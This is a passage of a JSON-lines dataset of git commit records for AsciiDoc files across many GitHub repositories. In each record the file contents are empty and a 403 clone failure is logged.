oot,joansmith\/spring-boot,joansmith\/spring-boot,DeezCashews\/spring-boot,NetoDevel\/spring-boot,philwebb\/spring-boot,lburgazzoli\/spring-boot,shangyi0102\/spring-boot,olivergierke\/spring-boot,ameraljovic\/spring-boot,bclozel\/spring-boot,lexandro\/spring-boot,NetoDevel\/spring-boot,javyzheng\/spring-boot,scottfrederick\/spring-boot,scottfrederick\/spring-boot,ilayaperumalg\/spring-boot,cleverjava\/jenkins2-course-spring-boot,dfa1\/spring-boot,hqrt\/jenkins2-course-spring-boot,linead\/spring-boot,ameraljovic\/spring-boot,nebhale\/spring-boot,vakninr\/spring-boot,SaravananParthasarathy\/SPSDemo,i007422\/jenkins2-course-spring-boot,eddumelendez\/spring-boot,brettwooldridge\/spring-boot,mbogoevici\/spring-boot,tsachev\/spring-boot,lenicliu\/spring-boot,chrylis\/spring-boot,lucassaldanha\/spring-boot,mrumpf\/spring-boot,Buzzardo\/spring-boot,linead\/spring-boot,SaravananParthasarathy\/SPSDemo,joansmith\/spring-boot,ilayaperumalg\/spring-boot,mosoft521\/spring-boot,sebastiankirsch\/spring-boot,mrumpf\/spring-boot,aahlenst\/spring-boot,wilkinsona\/spring-boot,zhanhb\/spring-boot,eddumelendez\/spring-boot,thomasdarimont\/spring-boot,jvz\/spring-boot,shakuzen\/spring-boot,jvz\/spring-boot,neo4j-contrib\/spring-boot,jbovet\/spring-boot,jxblum\/spring-boot,royclarkson\/spring-boot,isopov\/spring-boot,zhangshuangquan\/spring-root,bijukunjummen\/spring-boot,xiaoleiPENG\/my-project,pvorb\/spring-boot,mosoft521\/spring-boot,chrylis\/spring-boot,qerub\/spring-boot,jxblum\/spring-boot,RichardCSantana\/spring-boot,isopov\/spring-boot,mdeinum\/spring-boot,ptahchiev\/spring-boot,royclarkson\/spring-boot,joansmith\/spring-boot,cleverjava\/jenkins2-course-spring-boot,mbenson\/spring-boot,aahlenst\/spring-boot,akmaharshi\/jenkins,bbrouwer\/spring-boot,donhuvy\/spring-boot,rweisleder\/spring-boot,kdvolder\/spring-boot,pvorb\/spring-boot,jayarampradhan\/spring-boot,tiarebalbi\/spring-boot,brettwooldridge\/spring-boot,bjornlindstrom\/spring-boot,Nowheresly\/spring-boot,spring-projects\/spring-boot,zhangshuangquan\/spring-root,sbcoba\/spring-boot,mosoft521\/spring-boot,wilkinsona\/spring-boot,lburgazzoli\/spring-boot,sbuettner\/spring-boot,ollie314\/spring-boot,sbcoba\/spring-boot,kamilszymanski\/spring-boot,drumonii\/spring-boot,DeezCashews\/spring-boot,herau\/spring-boot,kamilszymanski\/spring-boot,chrylis\/spring-boot,sbcoba\/spring-boot,olivergierke\/spring-boot,javyzheng\/spring-boot,Buzzardo\/spring-boot,mosoft521\/spring-boot,sebastiankirsch\/spring-boot,htynkn\/spring-boot,ilayaperumalg\/spring-boot,lburgazzoli\/spring-boot,thomasdarimont\/spring-boot,ihoneymon\/spring-boot,jmnarloch\/spring-boot,mdeinum\/spring-boot,tsachev\/spring-boot,joshthornhill\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,sbuettner\/spring-boot,zhanhb\/spring-boot,spring-projects\/spring-boot,bjornlindstrom\/spring-boot,lexandro\/spring-boot,jbovet\/spring-boot,chrylis\/spring-boot,bjornlindstrom\/spring-boot,i007422\/jenkins2-course-spring-boot,rajendra-chola\/jenkins2-course-spring-boot,SaravananParthasarathy\/SPSDemo,RichardCSantana\/spring-boot,vakninr\/spring-boot,olivergierke\/spring-boot,joshiste\/spring-boot,qerub\/spring-boot,ihoneymon\/spring-boot,rweisleder\/spring-boot,felipeg48\/spring-boot,eddumelendez\/spring-boot,mrumpf\/spring-boot,tsachev\/spring-boot,xiaoleiPENG\/my-project,bjornlindstrom\/spring-boot,dreis2211\/spring-boot,shakuzen\/spring-boot,tsachev\/spring-boot,NetoDevel\/spring-boot,wilkinsona\/spring-boot,thomasdarimont\/spring-boot,drumonii\/spring-boot,afroje-reshma\/spring-boot-sample,philwebb\/spring-boot,lburgazzoli\/spring-boot,htynkn\/spring-boot,zhangshuangquan\/spring-root,philwebb\/spring-boot-concourse,ptahchiev\/spring-boot,izeye\/spring-boot,ameraljovic\/spring-boot,bijukunjummen\/spring-boot,jayarampradhan\/spring-boot,akmaharshi\/jenkins,bijukunjummen\/spring-boot,isopov\/spring-boot,drumonii\/spring-boot,bclozel\/spring-boot,shakuzen\/spring-boot,cleverjava\/jenkins2-course-spring-boot,hqrt\/jenkins2-course-spring-boot,qerub\/spring-boot,Nowheresly\/spring-boot,rweisleder\/spring-boot,drumonii\/spring-boot,candrews\/spring-boot,hello2009chen\/spring-boot,michael-simons\/spring-boot,aahlenst\/spring-boot,cleverjava\/jenkins2-course-spring-boot,dreis2211\/spring-boot,aahlenst\/spring-boot,scottfrederick\/spring-boot,michael-simons\/spring-boot,lucassaldanha\/spring-boot,dreis2211\/spring-boot,felipeg48\/spring-boot,zhangshuangquan\/spring-root,habuma\/spring-boot,i007422\/jenkins2-course-spring-boot,ihoneymon\/spring-boot,scottfrederick\/spring-boot,bclozel\/spring-boot,kdvolder\/spring-boot,kdvolder\/spring-boot,olivergierke\/spring-boot,RichardCSantana\/spring-boot,brettwooldridge\/spring-boot,izeye\/spring-boot,donhuvy\/spring-boot,ollie314\/spring-boot,bbrouwer\/spring-boot,isopov\/spring-boot,jmnarloch\/spring-boot,ihoneymon\/spring-boot,ilayaperumalg\/spring-boot,jvz\/spring-boot,lexandro\/spring-boot,mdeinum\/spring-boot,tiarebalbi\/spring-boot,candrews\/spring-boot,hqrt\/jenkins2-course-spring-boot,Nowheresly\/spring-boot,yhj630520\/spring-boot,i007422\/jenkins2-course-spring-boot,zhanhb\/spring-boot,vpavic\/spring-boot,javyzheng\/spring-boot,rweisleder\/spring-boot,hello2009chen\/spring-boot,afroje-reshma\/spring-boot-sample,htynkn\/spring-boot,scottfrederick\/spring-boot,scottfrederick\/spring-boot,Buzzardo\/spring-boot,mdeinum\/spring-boot,dreis2211\/spring-boot,candrews\/spring-boot,yangdd1205\/spring-boot,lucassaldanha\/spring-boot,NetoDevel\/spring-boot,Buzzardo\/spring-boot,minmay\/spring-boot,rweisleder\/spring-boot,afroje-reshma\/spring-boot-sample,sebastiankirsch\/spring-boot,eddumelendez\/spring-boot,philwebb\/spring-boot,bbrouwer\/spring-boot,jbovet\/spring-boot,akmaharshi\/jenkins,hello2009chen\/spring-boot,habuma\/spring-boot,lenicliu\/spring-boot,dreis2211\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,vakninr\/spring-boot,SaravananParthasarathy\/SPSDemo,shangyi0102\/spring-boot,mrumpf\/spring-boot,aahlenst\/spring-boot,mbenson\/spring-boot,jxblum\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,kdvolder\/spring-boot,hqrt\/jenkins2-course-spring-boot,i007422\/jenkins2-course-spring-boot,zhanhb\/spring-boot,DeezCashews\/spring-boot,brettwooldridge\/spring-boot,sebastiankirsch\/spring-boot,philwebb\/spring-boot-concourse,xiaoleiPENG\/my-project,mbenson\/spring-boot,vpavic\/spring-boot,ilayaperumalg\/spring-boot,kamilszymanski\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,ollie314\/spring-boot,mbogoevici\/spring-boot,mbenson\/spring-boot,felipeg48\/spring-boot,chrylis\/spring-boot,cleverjava\/jenkins2-course-spring-boot,zhanhb\/spring-boot,shangyi0102\/spring-boot,NetoDevel\/spring-boot,deki\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,vpavic\/spring-boot,Nowheresly\/spring-boot,joshthornhill\/spring-boot,mdeinum\/spring-boot,michael-simons\/spring-boot,jmnarloch\/spring-boot,deki\/spring-boot,spring-projects\/spring-boot,rweisleder\/spring-boot,bbrouwer\/spring-boot,thomasdarimont\/spring-boot,joshthornhill\/spring-boot,ptahchiev\/spring-boot,herau\/spring-boot,philwebb\/spring-boot-concourse,yhj630520\/spring-boot,habuma\/spring-boot,royclarkson\/spring-boot,javyzheng\/spring-boot,tiarebalbi\/spring-boot,mrumpf\/spring-boot,wilkinsona\/spring-boot,wilkinsona\/spring-boot,minmay\/spring-boot,jmnarloch\/spring-boot,bijukunjummen\/spring-boot,jxblum\/spring-boot,dreis2211\/spring-boot,tsachev\/spring-boot,ollie314\/spring-boot,lexandro\/spring-boot,ptahchiev\/spring-boot,philwebb\/spring-boot,sbuettner\/spring-boot,herau\/spring-boot,donhuvy\/spring-boot,lenicliu\/spring-boot,vakninr\/spring-boot,nebhale\/spring-boot,kdvolder\/spring-boot,sbcoba\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/appendix-application-properties.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/appendix-application-properties.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbogoevici\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b7fcd1776ac82eb9ee13be7e9a7bada2d8d130f0","subject":"Added link for S3 GSOD data set.","message":"Added link for S3 GSOD data set.\n","repos":"lowcloudnine\/singularity-spark,lowcloudnine\/singularity-spark","old_file":"docs\/data_sets.adoc","new_file":"docs\/data_sets.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lowcloudnine\/singularity-spark.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fc320ca7a9354bdbb04dd02a4562f3b1e3d55f7b","subject":"Update 2015-09-03-ProgramandolaWeb-Blog.adoc","message":"Update 2015-09-03-ProgramandolaWeb-Blog.adoc","repos":"SysAdmin-Blog\/SysAdmin-Blog.github.io,SysAdmin-Blog\/SysAdmin-Blog.github.io,SysAdmin-Blog\/SysAdmin-Blog.github.io","old_file":"_posts\/2015-09-03-ProgramandolaWeb-Blog.adoc","new_file":"_posts\/2015-09-03-ProgramandolaWeb-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SysAdmin-Blog\/SysAdmin-Blog.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"96ef3c3d04583a1e70f2fc2bbb061729051cb9ab","subject":"Update 2017-08-23-Your-Blog-title.adoc","message":"Update 2017-08-23-Your-Blog-title.adoc","repos":"nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io","old_file":"_posts\/2017-08-23-Your-Blog-title.adoc","new_file":"_posts\/2017-08-23-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nbourdin\/nbourdin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f1b6dd72672be7de6706ec3319dd90e375b43b4","subject":"Update 2019-01-31-Your-Blog-title.adoc","message":"Update 2019-01-31-Your-Blog-title.adoc","repos":"iwakuralai-n\/badgame-site,iwakuralai-n\/badgame-site,iwakuralai-n\/badgame-site,iwakuralai-n\/badgame-site","old_file":"_posts\/2019-01-31-Your-Blog-title.adoc","new_file":"_posts\/2019-01-31-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iwakuralai-n\/badgame-site.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"63f5ab91b19460d9ede1642248790d113b13e110","subject":"Update 2015-09-30-How-Judas-Iscariot-died.adoc","message":"Update 2015-09-30-How-Judas-Iscariot-died.adoc","repos":"sillyleo\/bible.notes,sillyleo\/bible.notes,sillyleo\/bible.notes","old_file":"_posts\/2015-09-30-How-Judas-Iscariot-died.adoc","new_file":"_posts\/2015-09-30-How-Judas-Iscariot-died.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sillyleo\/bible.notes.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"475375827289e109566086ed729a3bec2a5a95b7","subject":"y2b create post The $100 Pocket Cinema","message":"y2b create post The $100 Pocket Cinema","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-05-28-The-100-Pocket-Cinema.adoc","new_file":"_posts\/2016-05-28-The-100-Pocket-Cinema.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52a763e70c3b7605dc10d028929a0262d5557625","subject":"Update 1993-8-11-commoncommonfunctionphp-Hubpress-blog-usedcommonphp.adoc","message":"Update 1993-8-11-commoncommonfunctionphp-Hubpress-blog-usedcommonphp.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-8-11-commoncommonfunctionphp-Hubpress-blog-usedcommonphp.adoc","new_file":"_posts\/1993-8-11-commoncommonfunctionphp-Hubpress-blog-usedcommonphp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5014eeff0b4ac8858e376903c58bfb522b85be3c","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"73c829c072211b5a68ef971657f153c75e541181","subject":"Update 2015-02-24-Convention-de-nommage-SqlServer.adoc","message":"Update 2015-02-24-Convention-de-nommage-SqlServer.adoc","repos":"Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io","old_file":"_posts\/2015-02-24-Convention-de-nommage-SqlServer.adoc","new_file":"_posts\/2015-02-24-Convention-de-nommage-SqlServer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vtek\/vtek.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4d0bdf90289e63fc3a2e5e43c236488fbf8cc475","subject":"Update 2016-08-13-Hubbub.adoc","message":"Update 2016-08-13-Hubbub.adoc","repos":"bretonio\/bretonio.github.io,bretonio\/bretonio.github.io,bretonio\/bretonio.github.io,bretonio\/bretonio.github.io","old_file":"_posts\/2016-08-13-Hubbub.adoc","new_file":"_posts\/2016-08-13-Hubbub.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bretonio\/bretonio.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4ca5ebdf00f2a61a2be6591fd0a1aed1e3e5f63b","subject":"Update 2017-05-28-Diplom.adoc","message":"Update 2017-05-28-Diplom.adoc","repos":"dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru","old_file":"_posts\/2017-05-28-Diplom.adoc","new_file":"_posts\/2017-05-28-Diplom.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dsp25no\/blog.dsp25no.ru.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c2ed2399834fc1d2cd298dd7f4c8118f02e64690","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38895a1f1030302de46425287fa4902ffac0d0ad","subject":"Update 2015-10-11-Configure-Hadoop-261-on-Ubuntu-Server.adoc","message":"Update 2015-10-11-Configure-Hadoop-261-on-Ubuntu-Server.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-11-Configure-Hadoop-261-on-Ubuntu-Server.adoc","new_file":"_posts\/2015-10-11-Configure-Hadoop-261-on-Ubuntu-Server.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"48e78354d8d81f3abc6fbaf1fa7918cceb3bb407","subject":"Update 2016-05-13-Flume.adoc","message":"Update 2016-05-13-Flume.adoc","repos":"gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io","old_file":"_posts\/2016-05-13-Flume.adoc","new_file":"_posts\/2016-05-13-Flume.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gongxiancao\/gongxiancao.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc7c6c91452e4dbbbab642031a043f24ca42661b","subject":"Update 2017-02-09-test1.adoc","message":"Update 2017-02-09-test1.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-02-09-test1.adoc","new_file":"_posts\/2017-02-09-test1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e25d7db01a3d45bfa6f1b708f9cde473c0e96187","subject":"Quote version value in Docker Compose file","message":"Quote version value in Docker Compose file\n\nThe example Docker Compose file does not quote the version value however\nthe Docker Compose documentation specifies this value should be quoted\nto distinguish it from being treated as a number.\n\nRelate elastic\/elasticsearch#27745\n\nOriginal commit: elastic\/x-pack-elasticsearch@42ad68c3ac6ddbdd0d94603e6487067422b3a86a\n","repos":"robin13\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch","old_file":"docs\/en\/setup\/docker.asciidoc","new_file":"docs\/en\/setup\/docker.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ddfab16ce6088ec23a065675ddae961e40cd52a2","subject":"Update 2019-01-31-My-Alt-English-Title.adoc","message":"Update 2019-01-31-My-Alt-English-Title.adoc","repos":"ml4den\/hubpress,ml4den\/hubpress,ml4den\/hubpress,ml4den\/hubpress","old_file":"_posts\/2019-01-31-My-Alt-English-Title.adoc","new_file":"_posts\/2019-01-31-My-Alt-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ml4den\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c4f91429344820c748bcd5f25b710b1bdda0242","subject":"Kafka, Schema Registry and Avro guide","message":"Kafka, Schema Registry and Avro guide\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/kafka-schema-registry-avro.adoc","new_file":"docs\/src\/main\/asciidoc\/kafka-schema-registry-avro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"76eddf54bac234294d44e4bec201eeb8291e5b19","subject":"Rm Checkstyle plugin","message":"Rm Checkstyle plugin\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Dev tools\/Automated Eclipse install.adoc","new_file":"Dev tools\/Automated Eclipse install.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1d349190c3ee4c36a7a4ed5ca3bec2221babb3ea","subject":"Update docs","message":"Update docs\n","repos":"takezoe\/elasticsearch-hadoop,xjrk58\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/index.adoc","new_file":"docs\/src\/reference\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xjrk58\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"eb71b9e81388c225a9590e64ea0eafc71036ea81","subject":"Update 2017-09-20-test.adoc","message":"Update 2017-09-20-test.adoc","repos":"rballan\/rballan.github.io,rballan\/rballan.github.io,rballan\/rballan.github.io,rballan\/rballan.github.io","old_file":"_posts\/2017-09-20-test.adoc","new_file":"_posts\/2017-09-20-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rballan\/rballan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"18ecd26ea26849cbbf87b7d39bc55ee4eca82d38","subject":"Add revision\/date to reference docs.","message":"Add revision\/date to reference docs.\n","repos":"mp911de\/spring-cloud-vault-config,spencergibb\/spring-cloud-vault-config,mp911de\/spring-cloud-vault-config,spring-cloud-incubator\/spring-cloud-vault-config,spring-cloud-incubator\/spring-cloud-vault-config,spencergibb\/spring-cloud-vault-config","old_file":"docs\/src\/main\/asciidoc\/spring-cloud-vault-config.adoc","new_file":"docs\/src\/main\/asciidoc\/spring-cloud-vault-config.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud-incubator\/spring-cloud-vault-config.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9473376be7bc9c2c63136913c052d57df40939ab","subject":"Add AM v3 changelog","message":"Add AM v3 changelog\n","repos":"gravitee-io\/graviteeio-access-management,gravitee-io\/graviteeio-access-management,gravitee-io\/graviteeio-access-management,gravitee-io\/graviteeio-access-management,gravitee-io\/graviteeio-access-management","old_file":"CHANGELOG-v3.adoc","new_file":"CHANGELOG-v3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/graviteeio-access-management.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"51bf590a0e5f90269829ab9034b5fb9633610f88","subject":"Revised goals.adoc","message":"Revised goals.adoc\n","repos":"sk413025\/carcv,sk413025\/carcv,oskopek\/carcv,sk413025\/carcv,sk413025\/carcv,oskopek\/carcv,oskopek\/carcv,oskopek\/carcv,oskopek\/carcv,oskopek\/carcv,sk413025\/carcv,sk413025\/carcv","old_file":"docs\/goals.adoc","new_file":"docs\/goals.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sk413025\/carcv.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dc00d8d23253a35e4c75ed9de6fbb9f16ce24a8d","subject":"Updated goals","message":"Updated goals","repos":"sk413025\/carcv,oskopek\/carcv,oskopek\/carcv,sk413025\/carcv,sk413025\/carcv,oskopek\/carcv,sk413025\/carcv,oskopek\/carcv,oskopek\/carcv,sk413025\/carcv,sk413025\/carcv,oskopek\/carcv","old_file":"docs\/goals.adoc","new_file":"docs\/goals.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sk413025\/carcv.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9f5c237188107d8d6599aa6f47cbce91eaa196d9","subject":"Update 2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","message":"Update 2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","new_file":"_posts\/2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f9cbe76102ac56c928bb334c6569c4b0993347d","subject":"DELTASPIKE-813 Core docs: added DependentProvider, AnnotationInstanceProvider, AnnotationUtils","message":"DELTASPIKE-813 Core docs: added DependentProvider, AnnotationInstanceProvider, AnnotationUtils\n","repos":"struberg\/deltaspike,rdicroce\/deltaspike,os890\/deltaspike-vote,danielsoro\/deltaspike,subaochen\/deltaspike,mlachat\/deltaspike,subaochen\/deltaspike,subaochen\/deltaspike,mlachat\/deltaspike,os890\/DS_Discuss,Danny02\/deltaspike,struberg\/deltaspike,os890\/deltaspike-vote,struberg\/deltaspike,chkal\/deltaspike,os890\/deltaspike-vote,chkal\/deltaspike,os890\/DS_Discuss,idontgotit\/deltaspike,danielsoro\/deltaspike,apache\/deltaspike,apache\/deltaspike,chkal\/deltaspike,os890\/DS_Discuss,rdicroce\/deltaspike,os890\/DS_Discuss,apache\/deltaspike,Danny02\/deltaspike,idontgotit\/deltaspike,subaochen\/deltaspike,rdicroce\/deltaspike,mlachat\/deltaspike,rdicroce\/deltaspike,chkal\/deltaspike,Danny02\/deltaspike,mlachat\/deltaspike,idontgotit\/deltaspike,apache\/deltaspike,danielsoro\/deltaspike,Danny02\/deltaspike,danielsoro\/deltaspike,struberg\/deltaspike,idontgotit\/deltaspike,os890\/deltaspike-vote","old_file":"documentation\/src\/main\/asciidoc\/core.adoc","new_file":"documentation\/src\/main\/asciidoc\/core.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Danny02\/deltaspike.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7d4767cc440733ae38615cf0c51b37ef52df5dd9","subject":"Update 2015-03-09-Mud-Masters-Haarlemmermeer-2015.adoc","message":"Update 2015-03-09-Mud-Masters-Haarlemmermeer-2015.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2015-03-09-Mud-Masters-Haarlemmermeer-2015.adoc","new_file":"_posts\/2015-03-09-Mud-Masters-Haarlemmermeer-2015.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b314fe1ded39288b21d45ffd6a7505a4301279fb","subject":"y2b create post Unboxing An Electric Toothbrush","message":"y2b create post Unboxing An Electric Toothbrush","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-11-24-Unboxing-An-Electric-Toothbrush.adoc","new_file":"_posts\/2015-11-24-Unboxing-An-Electric-Toothbrush.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 